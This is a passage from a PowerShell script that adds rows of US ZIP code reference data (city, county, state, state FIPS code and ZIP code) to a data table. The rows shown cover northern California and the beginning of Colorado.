valley","Mendocino","California","CA","6","95469") + $null = $Cities.Rows.Add("Redwood valley","Mendocino","California","CA","6","95470") + $null = $Cities.Rows.Add("Rio nido","Sonoma","California","CA","6","95471") + $null = $Cities.Rows.Add("Freestone","Sonoma","California","CA","6","95472") + $null = $Cities.Rows.Add("Sonoma","Sonoma","California","CA","6","95476") + $null = $Cities.Rows.Add("Stewarts point","Sonoma","California","CA","6","95480") + $null = $Cities.Rows.Add("Talmage","Mendocino","California","CA","6","95481") + $null = $Cities.Rows.Add("Ukiah","Mendocino","California","CA","6","95482") + $null = $Cities.Rows.Add("Upper lake","Lake","California","CA","6","95485") + $null = $Cities.Rows.Add("Westport","Mendocino","California","CA","6","95488") + $null = $Cities.Rows.Add("Willits","Mendocino","California","CA","6","95490") + $null = $Cities.Rows.Add("Windsor","Sonoma","California","CA","6","95492") + $null = $Cities.Rows.Add("Witter springs","Lake","California","CA","6","95493") + $null = $Cities.Rows.Add("Yorkville","Mendocino","California","CA","6","95494") + $null = $Cities.Rows.Add("The sea ranch","Sonoma","California","CA","6","95497") + $null = $Cities.Rows.Add("Zcta 954hh","Lake","California","CA","6","954HH") + $null = $Cities.Rows.Add("Zcta 954xx","Mendocino","California","CA","6","954XX") + $null = $Cities.Rows.Add("Eureka","Humboldt","California","CA","6","95501") + $null = $Cities.Rows.Add("Eureka","Humboldt","California","CA","6","95502") + $null = $Cities.Rows.Add("Eureka","Humboldt","California","CA","6","95503") + $null = $Cities.Rows.Add("Alderpoint","Humboldt","California","CA","6","95511") + $null = $Cities.Rows.Add("Blocksburg","Humboldt","California","CA","6","95514") + $null = $Cities.Rows.Add("Zcta 95519","Humboldt","California","CA","6","95519") + $null = $Cities.Rows.Add("Mc kinleyville","Humboldt","California","CA","6","95521") + $null = $Cities.Rows.Add("Bayside","Humboldt","California","CA","6","95524") + $null = $Cities.Rows.Add("Blue lake","Humboldt","California","CA","6","95525") + $null = $Cities.Rows.Add("Ruth","Humboldt","California","CA","6","95526") + $null = $Cities.Rows.Add("Burnt ranch","Trinity","California","CA","6","95527") + $null = $Cities.Rows.Add("Carlotta","Humboldt","California","CA","6","95528") + $null = $Cities.Rows.Add("Crescent city","Del Norte","California","CA","6","95531") + $null = $Cities.Rows.Add("Ferndale","Humboldt","California","CA","6","95536") + $null = $Cities.Rows.Add("Fields landing","Humboldt","California","CA","6","95537") + $null = $Cities.Rows.Add("Fortuna","Humboldt","California","CA","6","95540") + $null = $Cities.Rows.Add("Garberville","Humboldt","California","CA","6","95542") + $null = $Cities.Rows.Add("Gasquet","Del Norte","California","CA","6","95543") + $null = $Cities.Rows.Add("Honeydew","Humboldt","California","CA","6","95545") + $null = $Cities.Rows.Add("Hoopa","Humboldt","California","CA","6","95546") + $null = $Cities.Rows.Add("Hydesville","Humboldt","California","CA","6","95547") + $null = $Cities.Rows.Add("Klamath","Del Norte","California","CA","6","95548") + $null = $Cities.Rows.Add("Kneeland","Humboldt","California","CA","6","95549") + $null = $Cities.Rows.Add("Korbel","Humboldt","California","CA","6","95550") + $null = $Cities.Rows.Add("Loleta","Humboldt","California","CA","6","95551") + $null = $Cities.Rows.Add("Mad river","Trinity","California","CA","6","95552") + $null = $Cities.Rows.Add("Miranda","Humboldt","California","CA","6","95553") + $null = $Cities.Rows.Add("Myers flat","Humboldt","California","CA","6","95554") + $null = $Cities.Rows.Add("Orick","Humboldt","California","CA","6","95555") + $null = $Cities.Rows.Add("Orleans","Humboldt","California","CA","6","95556") + $null = $Cities.Rows.Add("Petrolia","Humboldt","California","CA","6","95558") + $null = $Cities.Rows.Add("Phillipsville","Humboldt","California","CA","6","95559") + $null = $Cities.Rows.Add("Redway","Humboldt","California","CA","6","95560") + $null = $Cities.Rows.Add("Rio dell","Humboldt","California","CA","6","95562") + $null = $Cities.Rows.Add("Salyer","Trinity","California","CA","6","95563") + $null = $Cities.Rows.Add("Samoa","Humboldt","California","CA","6","95564") + $null = $Cities.Rows.Add("Scotia","Humboldt","California","CA","6","95565") + $null = $Cities.Rows.Add("Smith river","Del Norte","California","CA","6","95567") + $null = $Cities.Rows.Add("Somes bar","Siskiyou","California","CA","6","95568") + $null = $Cities.Rows.Add("Redcrest","Humboldt","California","CA","6","95569") + $null = $Cities.Rows.Add("Westhaven","Humboldt","California","CA","6","95570") + $null = $Cities.Rows.Add("Weott","Humboldt","California","CA","6","95571") + $null = $Cities.Rows.Add("Willow creek","Humboldt","California","CA","6","95573") + $null = $Cities.Rows.Add("Leggett","Mendocino","California","CA","6","95585") + $null = $Cities.Rows.Add("Piercy","Mendocino","California","CA","6","95587") + $null = $Cities.Rows.Add("Whitethorn","Humboldt","California","CA","6","95589") + $null = $Cities.Rows.Add("Zenia","Trinity","California","CA","6","95595") + $null = $Cities.Rows.Add("Zcta 955hh","Del Norte","California","CA","6","955HH") + $null = $Cities.Rows.Add("Zcta 955xx","Humboldt","California","CA","6","955XX") + $null = $Cities.Rows.Add("Amador city","Amador","California","CA","6","95601") + $null = $Cities.Rows.Add("Auburn","Placer","California","CA","6","95602") + $null = $Cities.Rows.Add("Auburn","Placer","California","CA","6","95603") + $null = $Cities.Rows.Add("Bryte","Yolo","California","CA","6","95605") + $null = $Cities.Rows.Add("Brooks","Yolo","California","CA","6","95606") + $null = $Cities.Rows.Add("Capay","Yolo","California","CA","6","95607") + $null = $Cities.Rows.Add("Carmichael","Sacramento","California","CA","6","95608") + $null = $Cities.Rows.Add("Citrus heights","Sacramento","California","CA","6","95610") + $null = $Cities.Rows.Add("Clarksburg","Yolo","California","CA","6","95612") + $null = $Cities.Rows.Add("Coloma","El Dorado","California","CA","6","95613") + $null = $Cities.Rows.Add("Cool","El Dorado","California","CA","6","95614") + $null = $Cities.Rows.Add("Courtland","Sacramento","California","CA","6","95615") + $null = $Cities.Rows.Add("Davis","Yolo","California","CA","6","95616") + $null = $Cities.Rows.Add("El macero","Yolo","California","CA","6","95618") + $null = $Cities.Rows.Add("Diamond springs","El Dorado","California","CA","6","95619") + $null = $Cities.Rows.Add("Liberty farms","Solano","California","CA","6","95620") + $null = $Cities.Rows.Add("Citrus heights","Sacramento","California","CA","6","95621") + $null = $Cities.Rows.Add("El dorado","El Dorado","California","CA","6","95623") + $null = $Cities.Rows.Add("Elk grove","Sacramento","California","CA","6","95624") + $null = $Cities.Rows.Add("Elmira","Solano","California","CA","6","95625") + $null = $Cities.Rows.Add("Elverta","Sacramento","California","CA","6","95626") + $null = $Cities.Rows.Add("Esparto","Yolo","California","CA","6","95627") + $null = $Cities.Rows.Add("Fair oaks","Sacramento","California","CA","6","95628") + $null = $Cities.Rows.Add("Fiddletown","Amador","California","CA","6","95629") + $null = $Cities.Rows.Add("El dorado hills","Sacramento","California","CA","6","95630") + $null = $Cities.Rows.Add("Foresthill","Placer","California","CA","6","95631") + $null = $Cities.Rows.Add("Galt","Sacramento","California","CA","6","95632") + $null = $Cities.Rows.Add("Garden valley","El Dorado","California","CA","6","95633") + $null = $Cities.Rows.Add("Georgetown","El Dorado","California","CA","6","95634") + $null = $Cities.Rows.Add("Greenwood","El Dorado","California","CA","6","95635") + $null = $Cities.Rows.Add("Grizzly flats","El Dorado","California","CA","6","95636") + $null = $Cities.Rows.Add("Guinda","Yolo","California","CA","6","95637") + $null = $Cities.Rows.Add("Herald","Sacramento","California","CA","6","95638") + $null = $Cities.Rows.Add("Hood","Sacramento","California","CA","6","95639") + $null = $Cities.Rows.Add("Ione","Amador","California","CA","6","95640") + $null = $Cities.Rows.Add("Isleton","Sacramento","California","CA","6","95641") + $null = $Cities.Rows.Add("Jackson","Amador","California","CA","6","95642") + $null = $Cities.Rows.Add("Knights landing","Yolo","California","CA","6","95645") + $null = $Cities.Rows.Add("Kirkwood","Alpine","California","CA","6","95646") + $null = $Cities.Rows.Add("Lincoln","Placer","California","CA","6","95648") + $null = $Cities.Rows.Add("Loomis","Placer","California","CA","6","95650") + $null = $Cities.Rows.Add("Lotus","El Dorado","California","CA","6","95651") + $null = $Cities.Rows.Add("Madison","Yolo","California","CA","6","95653") + $null = $Cities.Rows.Add("Mather afb","Sacramento","California","CA","6","95655") + $null = $Cities.Rows.Add("Newcastle","Placer","California","CA","6","95658") + $null = $Cities.Rows.Add("Trowbridge","Sutter","California","CA","6","95659") + $null = $Cities.Rows.Add("North highlands","Sacramento","California","CA","6","95660") + $null = $Cities.Rows.Add("Roseville","Placer","California","CA","6","95661") + $null = $Cities.Rows.Add("Orangevale","Sacramento","California","CA","6","95662") + $null = $Cities.Rows.Add("Penryn","Placer","California","CA","6","95663") + $null = $Cities.Rows.Add("Pilot hill","El Dorado","California","CA","6","95664") + $null = $Cities.Rows.Add("Pine grove","Amador","California","CA","6","95665") + $null = $Cities.Rows.Add("Pioneer","Amador","California","CA","6","95666") + $null = $Cities.Rows.Add("Placerville","El Dorado","California","CA","6","95667") + $null = $Cities.Rows.Add("Pleasant grove","Sutter","California","CA","6","95668") + $null = $Cities.Rows.Add("Plymouth","Amador","California","CA","6","95669") + $null = $Cities.Rows.Add("Gold river","Sacramento","California","CA","6","95670") + $null = $Cities.Rows.Add("Rescue","El Dorado","California","CA","6","95672") + $null = $Cities.Rows.Add("Rio linda","Sacramento","California","CA","6","95673") + $null = $Cities.Rows.Add("Rio oso","Sutter","California","CA","6","95674") + $null = $Cities.Rows.Add("River pines","Amador","California","CA","6","95675") + $null = $Cities.Rows.Add("Robbins","Sutter","California","CA","6","95676") + $null = $Cities.Rows.Add("Rocklin","Placer","California","CA","6","95677") + $null = $Cities.Rows.Add("Roseville","Placer","California","CA","6","95678") + $null = $Cities.Rows.Add("Sheridan","Placer","California","CA","6","95681") + $null = $Cities.Rows.Add("Cameron park","El Dorado","California","CA","6","95682") + $null = $Cities.Rows.Add("Rancho murieta","Sacramento","California","CA","6","95683") + $null = $Cities.Rows.Add("Somerset","El Dorado","California","CA","6","95684") + $null = $Cities.Rows.Add("Sutter creek","Amador","California","CA","6","95685") + $null = $Cities.Rows.Add("Thornton","San Joaquin","California","CA","6","95686") + $null = $Cities.Rows.Add("Vacaville","Solano","California","CA","6","95687") + $null = $Cities.Rows.Add("Vacaville","Solano","California","CA","6","95688") + $null = $Cities.Rows.Add("Volcano","Amador","California","CA","6","95689") + $null = $Cities.Rows.Add("Walnut grove","Sacramento","California","CA","6","95690") + $null = $Cities.Rows.Add("West sacramento","Yolo","California","CA","6","95691") + $null = $Cities.Rows.Add("Wheatland","Yuba","California","CA","6","95692") + $null = $Cities.Rows.Add("Wilton","Sacramento","California","CA","6","95693") + $null = $Cities.Rows.Add("Winters","Yolo","California","CA","6","95694") + $null = $Cities.Rows.Add("Woodland","Yolo","California","CA","6","95695") + $null = $Cities.Rows.Add("Zcta 956hh","Amador","California","CA","6","956HH") + $null = $Cities.Rows.Add("Zcta 956xx","El Dorado","California","CA","6","956XX") + $null = $Cities.Rows.Add("Alta","Placer","California","CA","6","95701") + $null = $Cities.Rows.Add("Applegate","Placer","California","CA","6","95703") + $null = $Cities.Rows.Add("Camino","El Dorado","California","CA","6","95709") + $null = $Cities.Rows.Add("Iowa hill","Placer","California","CA","6","95713") + $null = $Cities.Rows.Add("Dutch flat","Placer","California","CA","6","95714") + $null = $Cities.Rows.Add("Emigrant gap","Placer","California","CA","6","95715") + $null = $Cities.Rows.Add("Gold run","Placer","California","CA","6","95717") + $null = $Cities.Rows.Add("Kyburz","El Dorado","California","CA","6","95720") + $null = $Cities.Rows.Add("Echo lake","El Dorado","California","CA","6","95721") + $null = $Cities.Rows.Add("Meadow vista","Placer","California","CA","6","95722") + $null = $Cities.Rows.Add("Pacific house","El Dorado","California","CA","6","95726") + $null = $Cities.Rows.Add("Soda springs","Placer","California","CA","6","95728") + $null = $Cities.Rows.Add("Twin bridges","El Dorado","California","CA","6","95735") + $null = $Cities.Rows.Add("Weimar","Placer","California","CA","6","95736") + $null = $Cities.Rows.Add("Rancho cordova","Sacramento","California","CA","6","95742") + $null = $Cities.Rows.Add("Granite bay","Placer","California","CA","6","95746") + $null = $Cities.Rows.Add("Roseville","Placer","California","CA","6","95747") + $null = $Cities.Rows.Add("Elk grove","Sacramento","California","CA","6","95758") + $null = $Cities.Rows.Add("El dorado hills","El Dorado","California","CA","6","95762") + $null = $Cities.Rows.Add("Rocklin","Placer","California","CA","6","95765") + $null = $Cities.Rows.Add("Woodland","Yolo","California","CA","6","95776") + $null = $Cities.Rows.Add("Zcta 957hh","El Dorado","California","CA","6","957HH") + $null = $Cities.Rows.Add("Zcta 957xx","Placer","California","CA","6","957XX") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95814") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95815") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95816") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95817") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95818") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95819") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95820") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95821") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95822") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95823") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95824") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95825") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95826") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95827") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95828") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95829") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95830") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95831") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95832") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95833") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95834") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95835") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95836") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95837") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95838") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95841") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95842") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95843") + $null = $Cities.Rows.Add("Sacramento","Sacramento","California","CA","6","95864") + $null = $Cities.Rows.Add("Zcta 958hh","Sacramento","California","CA","6","958HH") + $null = $Cities.Rows.Add("Marysville","Yuba","California","CA","6","95901") + $null = $Cities.Rows.Add("Beale afb","Yuba","California","CA","6","95903") + $null = $Cities.Rows.Add("Alleghany","Sierra","California","CA","6","95910") + $null = $Cities.Rows.Add("Arbuckle","Colusa","California","CA","6","95912") + $null = $Cities.Rows.Add("Artois","Glenn","California","CA","6","95913") + $null = $Cities.Rows.Add("Bangor","Butte","California","CA","6","95914") + $null = $Cities.Rows.Add("Berry creek","Butte","California","CA","6","95916") + $null = $Cities.Rows.Add("Biggs","Butte","California","CA","6","95917") + $null = $Cities.Rows.Add("Browns valley","Yuba","California","CA","6","95918") + $null = $Cities.Rows.Add("Brownsville","Yuba","California","CA","6","95919") + $null = $Cities.Rows.Add("Butte city","Glenn","California","CA","6","95920") + $null = $Cities.Rows.Add("Camptonville","Yuba","California","CA","6","95922") + $null = $Cities.Rows.Add("Canyondam","Plumas","California","CA","6","95923") + $null = $Cities.Rows.Add("Challenge","Yuba","California","CA","6","95925") + $null = $Cities.Rows.Add("Cohasset","Butte","California","CA","6","95926") + $null = $Cities.Rows.Add("Chico","Butte","California","CA","6","95928") + $null = $Cities.Rows.Add("Clipper mills","Butte","California","CA","6","95930") + $null = $Cities.Rows.Add("Colusa","Colusa","California","CA","6","95932") + $null = $Cities.Rows.Add("Crescent mills","Plumas","California","CA","6","95934") + $null = $Cities.Rows.Add("Dobbins","Yuba","California","CA","6","95935") + $null = $Cities.Rows.Add("Downieville","Sierra","California","CA","6","95936") + $null = $Cities.Rows.Add("Dunnigan","Colusa","California","CA","6","95937") + $null = $Cities.Rows.Add("Durham","Butte","California","CA","6","95938") + $null = $Cities.Rows.Add("Elk creek","Glenn","California","CA","6","95939") + $null = $Cities.Rows.Add("Forbestown","Butte","California","CA","6","95941") + $null = $Cities.Rows.Add("Butte meadows","Butte","California","CA","6","95942") + $null = $Cities.Rows.Add("Glenn","Glenn","California","CA","6","95943") + $null = $Cities.Rows.Add("Goodyears bar","Sierra","California","CA","6","95944") + $null = $Cities.Rows.Add("Grass valley","Nevada","California","CA","6","95945") + $null = $Cities.Rows.Add("Penn valley","Nevada","California","CA","6","95946") + $null = $Cities.Rows.Add("Greenville","Plumas","California","CA","6","95947") + $null = $Cities.Rows.Add("Gridley","Butte","California","CA","6","95948") + $null = $Cities.Rows.Add("Grass valley","Nevada","California","CA","6","95949") + $null = $Cities.Rows.Add("Grimes","Colusa","California","CA","6","95950") + $null = $Cities.Rows.Add("Hamilton city","Glenn","California","CA","6","95951") + $null = $Cities.Rows.Add("Live oak","Sutter","California","CA","6","95953") + $null = $Cities.Rows.Add("Magalia","Butte","California","CA","6","95954") + $null = $Cities.Rows.Add("Maxwell","Colusa","California","CA","6","95955") + $null = $Cities.Rows.Add("Meadow valley","Plumas","California","CA","6","95956") + $null = $Cities.Rows.Add("Meridian","Sutter","California","CA","6","95957") + $null = $Cities.Rows.Add("Nevada city","Nevada","California","CA","6","95959") + $null = $Cities.Rows.Add("North san juan","Nevada","California","CA","6","95960") + $null = $Cities.Rows.Add("Olivehurst","Yuba","California","CA","6","95961") + $null = $Cities.Rows.Add("Oregon house","Yuba","California","CA","6","95962") + $null = $Cities.Rows.Add("Orland","Glenn","California","CA","6","95963") + $null = $Cities.Rows.Add("Pulga","Butte","California","CA","6","95965") + $null = $Cities.Rows.Add("Oroville","Butte","California","CA","6","95966") + $null = $Cities.Rows.Add("Palermo","Butte","California","CA","6","95968") + $null = $Cities.Rows.Add("Paradise","Butte","California","CA","6","95969") + $null = $Cities.Rows.Add("Princeton","Colusa","California","CA","6","95970") + $null = $Cities.Rows.Add("Quincy","Plumas","California","CA","6","95971") + $null = $Cities.Rows.Add("Rackerby","Yuba","California","CA","6","95972") + $null = $Cities.Rows.Add("Richardson sprin","Butte","California","CA","6","95973") + $null = $Cities.Rows.Add("Richvale","Butte","California","CA","6","95974") + $null = $Cities.Rows.Add("Rough and ready","Nevada","California","CA","6","95975") + $null = $Cities.Rows.Add("Smartville","Nevada","California","CA","6","95977") + $null = $Cities.Rows.Add("Stirling city","Butte","California","CA","6","95978") + $null = $Cities.Rows.Add("Stonyford","Colusa","California","CA","6","95979") + $null = $Cities.Rows.Add("La porte","Yuba","California","CA","6","95981") + $null = $Cities.Rows.Add("Sutter","Sutter","California","CA","6","95982") + $null = $Cities.Rows.Add("Taylorsville","Plumas","California","CA","6","95983") + $null = $Cities.Rows.Add("Twain","Plumas","California","CA","6","95984") + $null = $Cities.Rows.Add("Washington","Nevada","California","CA","6","95986") + $null = $Cities.Rows.Add("Williams","Colusa","California","CA","6","95987") + $null = $Cities.Rows.Add("Willows","Glenn","California","CA","6","95988") + $null = $Cities.Rows.Add("Yuba city","Sutter","California","CA","6","95991") + $null = $Cities.Rows.Add("Yuba city","Sutter","California","CA","6","95993") + $null = $Cities.Rows.Add("Zcta 959hh","Butte","California","CA","6","959HH") + $null = $Cities.Rows.Add("Zcta 959xx","Butte","California","CA","6","959XX") + $null = $Cities.Rows.Add("Redding","Shasta","California","CA","6","96001") + $null = $Cities.Rows.Add("Redding","Shasta","California","CA","6","96002") + $null = $Cities.Rows.Add("Redding","Shasta","California","CA","6","96003") + $null = $Cities.Rows.Add("Adin","Modoc","California","CA","6","96006") + $null = $Cities.Rows.Add("Anderson","Shasta","California","CA","6","96007") + $null = $Cities.Rows.Add("Bella vista","Shasta","California","CA","6","96008") + $null = $Cities.Rows.Add("Bieber","Lassen","California","CA","6","96009") + $null = $Cities.Rows.Add("Big bar","Trinity","California","CA","6","96010") + $null = $Cities.Rows.Add("Big bend","Shasta","California","CA","6","96011") + $null = $Cities.Rows.Add("Burney","Shasta","California","CA","6","96013") + $null = $Cities.Rows.Add("Callahan","Siskiyou","California","CA","6","96014") + $null = $Cities.Rows.Add("Canby","Modoc","California","CA","6","96015") + $null = $Cities.Rows.Add("Cassel","Shasta","California","CA","6","96016") + $null = $Cities.Rows.Add("Castella","Shasta","California","CA","6","96017") + $null = $Cities.Rows.Add("Shasta lake","Shasta","California","CA","6","96019") + $null = $Cities.Rows.Add("Chester","Plumas","California","CA","6","96020") + $null = $Cities.Rows.Add("Corning","Tehama","California","CA","6","96021") + $null = $Cities.Rows.Add("Cottonwood","Shasta","California","CA","6","96022") + $null = $Cities.Rows.Add("Dorris","Siskiyou","California","CA","6","96023") + $null = $Cities.Rows.Add("Douglas city","Trinity","California","CA","6","96024") + $null = $Cities.Rows.Add("Dunsmuir","Siskiyou","California","CA","6","96025") + $null = $Cities.Rows.Add("Sawyers bar","Siskiyou","California","CA","6","96027") + $null = $Cities.Rows.Add("Fall river mills","Shasta","California","CA","6","96028") + $null = $Cities.Rows.Add("Flournoy","Tehama","California","CA","6","96029") + $null = $Cities.Rows.Add("Forks of salmon","Siskiyou","California","CA","6","96031") + $null = $Cities.Rows.Add("Fort jones","Siskiyou","California","CA","6","96032") + $null = $Cities.Rows.Add("French gulch","Shasta","California","CA","6","96033") + $null = $Cities.Rows.Add("Gazelle","Siskiyou","California","CA","6","96034") + $null = $Cities.Rows.Add("Gerber","Tehama","California","CA","6","96035") + $null = $Cities.Rows.Add("Greenview","Siskiyou","California","CA","6","96037") + $null = $Cities.Rows.Add("Grenada","Siskiyou","California","CA","6","96038") + $null = $Cities.Rows.Add("Happy camp","Siskiyou","California","CA","6","96039") + $null = $Cities.Rows.Add("Hat creek","Shasta","California","CA","6","96040") + $null = $Cities.Rows.Add("Hayfork","Trinity","California","CA","6","96041") + $null = $Cities.Rows.Add("Hornbrook","Siskiyou","California","CA","6","96044") + $null = $Cities.Rows.Add("Hyampom","Trinity","California","CA","6","96046") + $null = $Cities.Rows.Add("Igo","Shasta","California","CA","6","96047") + $null = $Cities.Rows.Add("Helena","Trinity","California","CA","6","96048") + $null = $Cities.Rows.Add("Klamath river","Siskiyou","California","CA","6","96050") + $null = $Cities.Rows.Add("Lakehead","Shasta","California","CA","6","96051") + $null = $Cities.Rows.Add("Lewiston","Trinity","California","CA","6","96052") + $null = $Cities.Rows.Add("Lookout","Modoc","California","CA","6","96054") + $null = $Cities.Rows.Add("Los molinos","Tehama","California","CA","6","96055") + $null = $Cities.Rows.Add("Mcarthur","Shasta","California","CA","6","96056") + $null = $Cities.Rows.Add("Mccloud","Siskiyou","California","CA","6","96057") + $null = $Cities.Rows.Add("Macdoel","Siskiyou","California","CA","6","96058") + $null = $Cities.Rows.Add("Manton","Tehama","California","CA","6","96059") + $null = $Cities.Rows.Add("Mill creek","Tehama","California","CA","6","96061") + $null = $Cities.Rows.Add("Millville","Shasta","California","CA","6","96062") + $null = $Cities.Rows.Add("Mineral","Tehama","California","CA","6","96063") + $null = $Cities.Rows.Add("Montague","Siskiyou","California","CA","6","96064") + $null = $Cities.Rows.Add("Montgomery creek","Shasta","California","CA","6","96065") + $null = $Cities.Rows.Add("Mount shasta","Siskiyou","California","CA","6","96067") + $null = $Cities.Rows.Add("Nubieber","Lassen","California","CA","6","96068") + $null = $Cities.Rows.Add("Oak run","Shasta","California","CA","6","96069") + $null = $Cities.Rows.Add("Old station","Shasta","California","CA","6","96071") + $null = $Cities.Rows.Add("Palo cedro","Shasta","California","CA","6","96073") + $null = $Cities.Rows.Add("Paskenta","Tehama","California","CA","6","96074") + $null = $Cities.Rows.Add("Paynes creek","Tehama","California","CA","6","96075") + $null = $Cities.Rows.Add("Wildwood","Shasta","California","CA","6","96076") + $null = $Cities.Rows.Add("Red bluff","Tehama","California","CA","6","96080") + $null = $Cities.Rows.Add("Round mountain","Shasta","California","CA","6","96084") + $null = $Cities.Rows.Add("Scott bar","Siskiyou","California","CA","6","96085") + $null = $Cities.Rows.Add("Seiad valley","Siskiyou","California","CA","6","96086") + $null = $Cities.Rows.Add("Shasta","Shasta","California","CA","6","96087") + $null = $Cities.Rows.Add("Shingletown","Shasta","California","CA","6","96088") + $null = $Cities.Rows.Add("Tehama","Tehama","California","CA","6","96090") + $null = $Cities.Rows.Add("Trinity center","Trinity","California","CA","6","96091") + $null = $Cities.Rows.Add("Vina","Tehama","California","CA","6","96092") + $null = $Cities.Rows.Add("Weaverville","Trinity","California","CA","6","96093") + $null = $Cities.Rows.Add("Edgewood","Siskiyou","California","CA","6","96094") + $null = $Cities.Rows.Add("Whiskeytown","Shasta","California","CA","6","96095") + $null = $Cities.Rows.Add("Whitmore","Shasta","California","CA","6","96096") + $null = $Cities.Rows.Add("Yreka","Siskiyou","California","CA","6","96097") + $null = $Cities.Rows.Add("Zcta 960hh","Lassen","California","CA","6","960HH") + $null = $Cities.Rows.Add("Zcta 960xx","Siskiyou","California","CA","6","960XX") + $null = $Cities.Rows.Add("Alturas","Modoc","California","CA","6","96101") + $null = $Cities.Rows.Add("Cromberg","Plumas","California","CA","6","96103") + $null = $Cities.Rows.Add("Cedarville","Modoc","California","CA","6","96104") + $null = $Cities.Rows.Add("Chilcoot","Plumas","California","CA","6","96105") + $null = $Cities.Rows.Add("Clio","Plumas","California","CA","6","96106") + $null = $Cities.Rows.Add("Coleville","Mono","California","CA","6","96107") + $null = $Cities.Rows.Add("Davis creek","Modoc","California","CA","6","96108") + $null = $Cities.Rows.Add("Doyle","Lassen","California","CA","6","96109") + $null = $Cities.Rows.Add("Eagleville","Modoc","California","CA","6","96110") + $null = $Cities.Rows.Add("Fort bidwell","Modoc","California","CA","6","96112") + $null = $Cities.Rows.Add("Herlong","Lassen","California","CA","6","96113") + $null = $Cities.Rows.Add("Janesville","Lassen","California","CA","6","96114") + $null = $Cities.Rows.Add("Lake city","Modoc","California","CA","6","96115") + $null = $Cities.Rows.Add("Likely","Modoc","California","CA","6","96116") + $null = $Cities.Rows.Add("Litchfield","Lassen","California","CA","6","96117") + $null = $Cities.Rows.Add("Loyalton","Sierra","California","CA","6","96118") + $null = $Cities.Rows.Add("Madeline","Lassen","California","CA","6","96119") + $null = $Cities.Rows.Add("Hope valley","Alpine","California","CA","6","96120") + $null = $Cities.Rows.Add("Milford","Lassen","California","CA","6","96121") + $null = $Cities.Rows.Add("Portola","Plumas","California","CA","6","96122") + $null = $Cities.Rows.Add("Ravendale","Lassen","California","CA","6","96123") + $null = $Cities.Rows.Add("Calpine","Sierra","California","CA","6","96124") + $null = $Cities.Rows.Add("Sierra city","Sierra","California","CA","6","96125") + $null = $Cities.Rows.Add("Sierraville","Sierra","California","CA","6","96126") + $null = $Cities.Rows.Add("Standish","Lassen","California","CA","6","96128") + $null = $Cities.Rows.Add("Susanville","Lassen","California","CA","6","96130") + $null = $Cities.Rows.Add("Termo","Lassen","California","CA","6","96132") + $null = $Cities.Rows.Add("Topaz","Mono","California","CA","6","96133") + $null = $Cities.Rows.Add("Tulelake","Siskiyou","California","CA","6","96134") + $null = $Cities.Rows.Add("Wendel","Lassen","California","CA","6","96136") + $null = $Cities.Rows.Add("Peninsula villag","Lassen","California","CA","6","96137") + $null = $Cities.Rows.Add("Carnelian bay","Placer","California","CA","6","96140") + $null = $Cities.Rows.Add("Homewood","Placer","California","CA","6","96141") + $null = $Cities.Rows.Add("Tahoma","El Dorado","California","CA","6","96142") + $null = $Cities.Rows.Add("Kings beach","Placer","California","CA","6","96143") + $null = $Cities.Rows.Add("Tahoe city","Placer","California","CA","6","96145") + $null = $Cities.Rows.Add("Olympic valley","Placer","California","CA","6","96146") + $null = $Cities.Rows.Add("Tahoe vista","Placer","California","CA","6","96148") + $null = $Cities.Rows.Add("South lake tahoe","El Dorado","California","CA","6","96150") + $null = $Cities.Rows.Add("Truckee","Nevada","California","CA","6","96161") + $null = $Cities.Rows.Add("Zcta 961hh","El Dorado","California","CA","6","961HH") + $null = $Cities.Rows.Add("Zcta 961xx","Lassen","California","CA","6","961XX") + $null = $Cities.Rows.Add("","Modoc","California","CA","6","97635") + $null = $Cities.Rows.Add("","Modoc","California","CA","6","976HH") + $null = $Cities.Rows.Add("Arvada","Jefferson","Colorado","CO","8","80002") + $null = $Cities.Rows.Add("Arvada","Jefferson","Colorado","CO","8","80003") + $null = $Cities.Rows.Add("Arvada","Jefferson","Colorado","CO","8","80004") + $null = $Cities.Rows.Add("Arvada","Jefferson","Colorado","CO","8","80005") + $null = $Cities.Rows.Add("Zcta 80007","Jefferson","Colorado","CO","8","80007") + $null = $Cities.Rows.Add("Aurora","Adams","Colorado","CO","8","80010") + $null = $Cities.Rows.Add("Aurora","Arapahoe","Colorado","CO","8","80011") + $null = $Cities.Rows.Add("Aurora","Arapahoe","Colorado","CO","8","80012") + $null = $Cities.Rows.Add("Aurora","Arapahoe","Colorado","CO","8","80013") + $null = $Cities.Rows.Add("Aurora","Arapahoe","Colorado","CO","8","80014") + $null = $Cities.Rows.Add("Aurora","Arapahoe","Colorado","CO","8","80015") + $null = $Cities.Rows.Add("Aurora","Arapahoe","Colorado","CO","8","80016") + $null = $Cities.Rows.Add("Aurora","Arapahoe","Colorado","CO","8","80017") + $null = $Cities.Rows.Add("Aurora","Arapahoe","Colorado","CO","8","80018") + $null = 